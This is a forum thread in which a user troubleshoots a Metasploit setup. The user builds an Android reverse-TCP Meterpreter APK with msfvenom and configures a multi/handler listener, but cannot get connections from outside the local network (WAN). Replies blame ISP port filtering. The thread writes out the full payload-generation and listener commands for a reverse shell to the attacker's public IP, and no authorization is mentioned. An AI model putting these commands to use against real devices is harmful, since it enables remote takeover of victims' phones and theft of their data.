Forum Thread: Port Forwarding Problem in Metasploit Can't Establish Connection (WAN)

Hi, i am having a very weird problem i set up my payload with msfvenom here is my output:

msfvenom -p android/meterpreter/reversetcp LHOST=Public Ip LPORT=4444 R > /root/Desktop/android.apk

i tried also reversehttps and http.

I went to my router settings to configure port forwarding :
screen shot of my router:
http://postimg.org/image/i3mp5xfo1/

than i went to msfconsole--> use exploit/multi/handler
set payload android/meterpreter/reversetcp
set LHOST 192.168.10.104 (lan ip of the mashine) i also tried with Public ip it change to 0.0.0.0
set LPORT 4444 i'v tired also other ports like 443, 80, 7777.
exploit . (nothing happend)

than i checked my ports if thay are open in : https://www.grc.com/x/ne.dll?rh1dkyd2 the status of my port 4444 was stealth so that means not open.. !! i also checked another web page http://www.canyouseeme.org/ and i got this error: Error: I could not see your service on 46.xx.xx.xxx on port (4444)

Reason: Connection timed out.

I am very confused why is this happening ?!

The only thing that i didnt try was to call my ISP and to ask if thay block the ports, reason why i not asked was because i tried that from 2 diffrent ISP-s from my apartmant and home.. because im using my home pc and my apartmant laptop for wan pentesting.

Btw LAN worked perfectly the problem is only in WAN.

Please tell me if i did anything wrong, and if i didnt please tell me were the problem is!

Thank you to all.

3 Responses

I am facing the same problem, i am unable to attack on WAN, i am confused that whether my ISP is blocking or my router's firewall is not allowing any one to connect on public ip.

please tell me also the solution

Thanks

Hi all,

Problem is solved thanks God!

The problem was at my ISP providers thay both did used filters to block all ports, now i have a diffrent ISP and everything works smoothly, just wanted to close this topic and tell everyone were the problem was.

Problem SOLVED.

Can it occurs due to real ip or shared ip? Does this work on shared ip?

Share Your Thoughts

  • Hot
  • Active